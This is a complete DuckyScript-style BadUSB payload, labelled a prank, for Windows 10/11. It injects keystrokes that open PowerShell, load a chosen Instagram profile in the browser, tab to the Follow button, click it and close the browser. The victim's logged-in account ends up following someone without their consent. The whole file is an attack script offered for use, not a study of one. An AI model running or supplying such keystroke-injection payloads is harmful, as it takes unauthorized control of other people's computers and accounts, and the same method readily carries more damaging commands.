* ################################################
* #                                              |
* # Title        : Follow someone on Instagram   |
* # Author       : Aleff                         |
* # Version      : 1.0                           |
* # Category     : Prank                         |
* # Target       : Windows 10/11                 |
* #                                              |
* ################################################


* Requirements:
*     - Internet Connection
*     - Instagram account logged in


DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

* You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
STRING Start-Process "#INSTAGRAM_LINK"; exit;
ENTER
* It depends by the computer power and by the internet connection power
DELAY 2000

* Go to Follow button and click it
REPEAT 12 TAB
DELAY 500
ENTER
DELAY 1000

* Close the Browser
ALT F4
